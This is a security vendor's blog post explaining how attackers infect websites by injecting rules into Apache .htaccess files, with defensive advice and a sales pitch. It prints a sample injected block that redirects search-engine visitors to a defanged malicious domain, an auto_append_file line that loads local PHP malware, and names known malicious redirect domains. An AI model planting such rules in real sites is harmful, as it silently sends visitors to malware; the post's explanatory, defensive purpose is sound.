This is the fifth part in our series of posts here at StopTheHacker where we describe the various methods that malicious hackers use to infect benign and legitimate websites with web-malware.
In this article we will talk about a very popular attack method used to infect legitimate websites: .htaccess redirection. This technique is used by hackers to redirect users visiting compromised websites to content on another infected or imposter website.
What is the purpose of the .htaccess file?Websites are powered by software called a “web server”. Web servers take requests to view web pages from browsers, like Internet Explorer, Google Chrome, or Firefox, and send it to the website visitor. There are many different web servers, including IIS and NGINX, and Apache, to name a few. The most popular being Apache.
Many web servers have a special per-directory configuration file. On Apache, this file is named “.htaccess”. This .htaccess file specifies rules that determine how and to whom your website should be sent. For example, this file could be used to stop users from viewing certain pages, or redirect users to a specific page when they request a webpage that is under construction, for example.
How are .htaccess files used?The .htaccess file can help you configure how users access pages on your website, whether they can view the contents of certain directories, whether specific web page requests are redirected to error pages (error 404 – not found) and more.
Webmasters often use .htaccess files to block web crawlers, automated spiders and malicious bots from viewing the website content. .htaccess files can also be used to prevent “hotlinking” of images on sites (like below).
2 | RewriteCond %{HTTP_REFERER} !^$ |
3 | RewriteCond %{HTTP_REFERER} !^http://(www\.)?mysite.com/.*$ [NC] |
4 | RewriteRule .(png|gif|jpg)$ – [F] |
Using the .htaccess file, hackers can redirect your visitors to another website. Malicious hackers often inject malicious lines of computer code in benign .htaccess files. These malicious lines of code can infect website visitors and cause user confusion.
Before inserting the malicious code into .htaccess files, hackers will sometimes prepend a number of empty lines to make the malicious entries more difficult to notice. Ensure that you search the entire “.htaccess” file for malware, not just the lines at the top.
What does a .htaccess file look like?A good example of the .htaccess file can be found
here and
here.
An example:
01 | ### BASIC PASSWORD PROTECTION ### |
04 | #AuthUserFile /.htpasswd |
05 | #AuthGroupFile /dev/null |
08 | ### ALLOW FROM IP OR VALID PASSWORD ### |
10 | #Allow from 192.168.1.23 |
14 | #<FilesMatch "\.(htaccess|htpasswd|ini|phps|fla|psd|log|sh)$"> |
19 | ### PREVENT HOTLINKING ### |
20 | #SetEnvIfNoCase Referer "^http://subdomain.domain.tld/" good |
21 | #SetEnvIfNoCase Referer "^$" good |
22 | #<FilesMatch "\.(png|jpg|jpeg|gif|bmp|swf|flv)$"> |
26 | # ErrorDocument 403 http://www.google.com/intl/en_ALL/images/logo.gif |
27 | # ErrorDocument 403 /images/you_bad_hotlinker.gif |
30 | ### LIMIT UPLOAD FILE SIZE TO PROTECT AGAINST DOS ATTACK ### |
31 | #LimitRequestBody 10240000 #bytes, 0-2147483647(2GB) |
Malicious code in an .htaccess file can look similar to the example below. Notice the “RewriteRule” statement tells the web server to direct visitors to “hxxp://sokoloperkovuskeci.com/in.php” for any request to the site that matches the “RewriteCond” statements.
This means visitors from many common search engines, including Ask, Google, MSN, and more, would be redirected to a malicious website.
04 | RewriteCond %{HTTP_REFERER} .ask.com.$ [NC,OR] |
05 | RewriteCond %{HTTP_REFERER} .google.$ [NC,OR] |
06 | RewriteCond %{HTTP_REFERER} .msn.com$ [NC,OR] |
07 | RewriteCond %{HTTP_REFERER} .bing.com$ [NC,OR] |
08 | RewriteCond %{HTTP_REFERER} .live.com$ [NC,OR] |
09 | RewriteCond %{HTTP_REFERER} .aol.com$ [NC,OR] |
10 | RewriteCond %{HTTP_REFERER} .altavista.com$ [NC,OR] |
11 | RewriteCond %{HTTP_REFERER} .excite.com$ [NC,OR] |
12 | RewriteCond %{HTTP_REFERER} .search.yahoo$ [NC] |
13 | RewriteRule .* hxxp://sokoloperkovuskeci.com/in.php[removed] [R,L] |
Popular .htaccess attacks have directed users to: xccgtswgokoe, villusoftreit.ru, and globalpoweringgatheringon.com.
Another technique uses the .htaccess file to modify the PHP value “auto_append_file” in a way such that a local file containing the malware is included with every request. Instead of redirection, the .htaccess is used to load malware from another local file to infect users with malware.
An example:
1 | php_value auto_append_file “/tmp/661829.php” |
This configuration appends the malware contained in the file “/tmp/661829.php” to every PHP request.
The PHP file could contain malware that resembles the example below:
How do I detect if my site is vulnerable?Monitor your site to see if there are any unexpected redirects and always keep backups of your (.htaccess) files to compare to those on your server.
Additionally, you should scan your website for application level vulnerabilities like SQL injection and Cross Site Scripting issues. These are all security holes that malicious hackers can exploit to break into your site and infect it, spreading malware to your visitors.
Conclusion.htaccess redirection is a common vector for malicious hackers to exploit and infect websites. We have seen what .htaccess files are, how they are used by malicious hackers, and how to protect your website.
StopTheHacker.com customers have access to resources and services that protect them against these kind of threats and help them recover from compromises should they occur. If you would like more information on how to protect your website, please feel free to
contact us.
